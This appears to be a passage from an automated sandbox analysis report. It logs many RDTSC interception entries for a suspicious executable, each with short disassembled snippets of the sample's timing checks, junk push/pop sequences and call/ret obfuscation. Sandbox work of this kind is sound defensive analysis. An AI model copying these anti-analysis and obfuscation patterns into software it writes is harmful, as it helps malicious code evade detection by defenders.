                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3877F1 second address: 3877F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3877F5 second address: 387818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F3A94CD4089h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 387818 second address: 387901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F3A9502B5E8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 movzx edi, dx 0x00000027 mov dword ptr [ebp+124553B9h], ebx 0x0000002d cmc 0x0000002e push dword ptr fs:[00000000h] 0x00000035 mov dword ptr [ebp+122D2EBCh], eax 0x0000003b stc 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 mov ebx, dword ptr [ebp+122D2C76h] 0x00000049 mov eax, dword ptr [ebp+122D0189h] 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007F3A9502B5E8h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Dh 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 call 00007F3A9502B5F0h 0x0000006e jmp 00007F3A9502B5F9h 0x00000073 pop ebx 0x00000074 push FFFFFFFFh 0x00000076 mov ebx, dword ptr [ebp+122D2381h] 0x0000007c nop 0x0000007d jl 00007F3A9502B5FAh 0x00000083 jmp 00007F3A9502B5F4h 0x00000088 push eax 0x00000089 push eax 0x0000008a push edx 0x0000008b jns 00007F3A9502B5ECh 0x00000091 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3896A1 second address: 3896C0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A94CD407Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007F3A94CD407Ch 0x00000013 jg 00007F3A94CD4076h 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3889BF second address: 3889C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38A7C5 second address: 38A7CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38984F second address: 389853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 389853 second address: 389859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 389859 second address: 38987C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3A9502B5EBh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jmp 00007F3A9502B5EDh 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 389959 second address: 38995F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38995F second address: 389965 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38A8D7 second address: 38A8DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38A8DE second address: 38A943 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A9502B5F1h 0x0000000e nop 0x0000000f jns 00007F3A9502B5E8h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov dword ptr [ebp+122D2928h], esi 0x00000022 mov dword ptr fs:[00000000h], esp 0x00000029 mov bx, C353h 0x0000002d mov eax, dword ptr [ebp+122D1491h] 0x00000033 push FFFFFFFFh 0x00000035 jmp 00007F3A9502B5F7h 0x0000003a nop 0x0000003b push eax 0x0000003c push edx 0x0000003d push esi 0x0000003e jng 00007F3A9502B5E6h 0x00000044 pop esi 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38A943 second address: 38A95A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4083h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38C7C0 second address: 38C7CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5EAh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38F7A7 second address: 38F7B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38F7B2 second address: 38F7B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38F7B6 second address: 38F832 instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edi 0x0000000d jl 00007F3A94CD4078h 0x00000013 pushad 0x00000014 popad 0x00000015 pop edi 0x00000016 nop 0x00000017 mov bx, si 0x0000001a push 00000000h 0x0000001c mov edi, dword ptr [ebp+122D194Ah] 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edx 0x00000027 call 00007F3A94CD4078h 0x0000002c pop edx 0x0000002d mov dword ptr [esp+04h], edx 0x00000031 add dword ptr [esp+04h], 0000001Ch 0x00000039 inc edx 0x0000003a push edx 0x0000003b ret 0x0000003c pop edx 0x0000003d ret 0x0000003e stc 0x0000003f xchg eax, esi 0x00000040 jmp 00007F3A94CD4086h 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F3A94CD4086h 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38F832 second address: 38F836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 390961 second address: 390967 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 390967 second address: 39096C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39096C second address: 3909DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F3A94CD4078h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov ebx, esi 0x00000027 sbb di, E6FAh 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F3A94CD4078h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000016h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 movzx ebx, bx 0x0000004b push 00000000h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F3A94CD4082h 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3909DB second address: 3909E1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3918A5 second address: 3918AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3A94CD4076h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38FAD6 second address: 38FAE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F3A9502B5E6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38FAE0 second address: 38FAE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 38FAE4 second address: 38FAF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39292E second address: 392932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 392A92 second address: 392B3B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 sub dword ptr [ebp+122D363Ah], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e jo 00007F3A9502B5EBh 0x00000024 mov edi, 5866FBD4h 0x00000029 mov dword ptr fs:[00000000h], esp 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007F3A9502B5E8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D3645h] 0x00000050 mov eax, dword ptr [ebp+122D094Dh] 0x00000056 or edi, dword ptr [ebp+124822A2h] 0x0000005c mov edi, dword ptr [ebp+122D2D2Ah] 0x00000062 push FFFFFFFFh 0x00000064 jnc 00007F3A9502B5F1h 0x0000006a nop 0x0000006b jmp 00007F3A9502B5F3h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 392B3B second address: 392B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 392B3F second address: 392B45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39498F second address: 394993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 394993 second address: 394999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 394999 second address: 39499E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39C0FE second address: 39C106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39C106 second address: 39C10A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39B9A1 second address: 39B9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A9502B5F1h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39B9B6 second address: 39B9D6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4082h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39BB08 second address: 39BB13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 39BB13 second address: 39BB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A20EC second address: 3A2113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pushad 0x00000008 jo 00007F3A9502B5FBh 0x0000000e jmp 00007F3A9502B5F5h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A2113 second address: 3A212C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3A94CD407Ah 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A212C second address: 3A2136 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A2136 second address: 3A2148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A2148 second address: 3A2157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A2157 second address: 3A215B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A238F second address: 3A2394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A2394 second address: 3A2399 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A7764 second address: 3A7783 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F2h 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A6B03 second address: 3A6B08 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A6B08 second address: 3A6B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jl 00007F3A9502B5E6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A6F0D second address: 3A6F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A6F13 second address: 3A6F1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A6F1F second address: 3A6F25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A75D2 second address: 3A75D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A75D6 second address: 3A75DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A75DE second address: 3A75F4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F3A9502B5ECh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A75F4 second address: 3A75FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3A75FA second address: 3A75FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 336309 second address: 33630D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33630D second address: 336329 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 336329 second address: 33632F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 33632F second address: 33634C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F9h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B073D second address: 3B0751 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B0751 second address: 3B0755 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B0755 second address: 3B0761 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3A94CD4076h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B0FE3 second address: 3B0FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B115B second address: 3B1169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B143B second address: 3B1441 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 360F8A second address: 360F8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 360F8E second address: 360FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3399A1 second address: 3399A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B66D9 second address: 3B66F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F3h 0x00000009 jg 00007F3A9502B5E6h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B66F6 second address: 3B66FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B685D second address: 3B6869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F3A9502B5E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B6869 second address: 3B686E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B686E second address: 3B6883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F3A9502B5E6h 0x0000000a jmp 00007F3A9502B5EBh 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B6883 second address: 3B68A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 ja 00007F3A94CD4076h 0x0000000d jmp 00007F3A94CD407Ch 0x00000012 pop esi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B68A4 second address: 3B68AD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B68AD second address: 3B68B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B6BC9 second address: 3B6BDF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B6BDF second address: 3B6BE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B7019 second address: 3B701D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B701D second address: 3B7023 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\9ICG2PuZbG.exeRDTSC instruction interceptor: First address: 3B7023 second address: 3B7029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
